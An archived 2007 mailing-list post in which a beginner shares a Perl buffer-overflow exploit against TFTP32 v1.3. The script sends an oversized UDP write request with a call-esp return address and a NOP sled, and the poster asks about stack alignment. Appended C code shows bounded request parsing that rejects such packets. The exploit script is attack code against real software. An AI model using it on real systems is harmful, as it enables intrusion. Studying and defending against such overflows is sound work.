Vulnerability Development mailing list archives

Help needed in TFTP32v1.3 BO


From: wong yu liang <yuliang11 () yahoo com>
Date: Tue, 16 Oct 2007 22:53:53 -0700 (PDT)




hi all, 
  I'm new to buffer overflows. I've gone through some basic examples of buffer overflows; now I'm trying to write my own exploit based on this software. Basically I found this Perl script somewhere on the net. It takes 264 bytes to overflow, with 4 bytes extra for the EIP.
  I'm using call esp, #0x77e2d9d3 advapi32.dll WinXP SP2 for the RET, and I found that I'm still 4 bytes off when I dump the ESP register in OllyDbg. I've seen some examples on the net like "add esp 10, ret 4", but I'm not sure what it means. Hope someone can enlighten me on this. Thanks 


use strict;
use warnings;
use IO::Socket;   # also exports inet_aton/sockaddr_in from Socket

my $host = "10.10.10.2"; # Target IP here
my $port = 69;           # Target port here. TFTP uses UDP 69

# 0x77e2d9d3 advapi32.dll
my $shellcode = "\xd3\xd9\xe2\x77";

$shellcode .= "\x90" x 136; # NOPs (136 bytes)

my $buf = "\x00\x02";
$buf .= "\x41" x 264;

$buf .= $shellcode;

# Print size of buffer
print "Length: ", length($buf), "\n";

# Try to create socket
my $socket = IO::Socket::INET->new(Proto => "udp")
    or die "Cannot Create Socket: $@\n";
my $ipaddr   = inet_aton($host) || $host;
my $portaddr = sockaddr_in($port, $ipaddr);

# Send our evil buffer
send($socket, $buf, 0, $portaddr) == length($buf)
    or die "Cannot Send Buffer: $!\n";
print "All Done\n";




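The datagram shape the script above sends (opcode 0x0002 followed by a filename long enough to overwrite the saved return address) is exactly what a TFTP request parser has to refuse before copying anything into a fixed stack buffer. The C below is an added illustration of that bounded-parsing pattern, not TFTP32's code and not from the original post; the 255-byte filename cap, the struct layout and the demo_* helpers are assumptions made for this example.

```c
#include <stdint.h>
#include <string.h>

#define TFTP_MAX_NAME 255 /* assumed cap for this example; RFC 1350 sets none */

struct tftp_req { uint16_t opcode; char filename[TFTP_MAX_NAME + 1]; char mode[16]; };
/* Copy one NUL-terminated field out of the datagram into a fixed buffer.
   Returns the field length, or -1 if it is unterminated, empty or too long. */
static long take_field(const unsigned char *p, size_t avail, char *dst, size_t cap)
{
    const unsigned char *nul = memchr(p, '\0', avail);
    if (!nul) return -1;                       /* runs off the end of the datagram */
    size_t n = (size_t)(nul - p);
    if (n == 0 || n >= cap) return -1;         /* never exceed the destination */
    memcpy(dst, p, n);
    dst[n] = '\0';
    return (long)n;
}

/* Returns 0 and fills *out for a well-formed RRQ/WRQ, -1 otherwise. */
int tftp_parse_request(const unsigned char *pkt, size_t len, struct tftp_req *out)
{
    if (len < 4) return -1;                    /* opcode plus two terminators, minimum */
    uint16_t op = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (op != 1 && op != 2) return -1;         /* RRQ or WRQ only */
    long fl = take_field(pkt + 2, len - 2, out->filename, sizeof out->filename);
    if (fl < 0) return -1;
    size_t off = 2 + (size_t)fl + 1;           /* skip opcode, name and its NUL */
    if (take_field(pkt + off, len - off, out->mode, sizeof out->mode) < 0) return -1;
    out->opcode = op;
    return 0;
}

/* Constructed sample: a WRQ (opcode 2) carrying a 264-byte filename, the
   length the script above uses to reach the saved return address. */
int demo_oversized(void)
{
    unsigned char pkt[2 + 264 + 1 + 6]; struct tftp_req r; size_t n = 0;
    pkt[n++] = 0x00; pkt[n++] = 0x02;
    memset(pkt + n, 'A', 264); n += 264; pkt[n++] = '\0';
    memcpy(pkt + n, "octet", 6); n += 6;
    return tftp_parse_request(pkt, n, &r);     /* -1: name exceeds TFTP_MAX_NAME */
}

/* Constructed sample: an ordinary read request that must still be accepted. */
int demo_valid(struct tftp_req *r)
{
    static const unsigned char pkt[] = "\x00\x01" "test.txt" "\0" "octet" "\0";
    return tftp_parse_request(pkt, sizeof pkt - 1, r);   /* 0 */
}
```

The same length check is what a defender would look for when auditing a TFTP daemon's request handling: the filename must be validated against the destination buffer's size before any copy, not after.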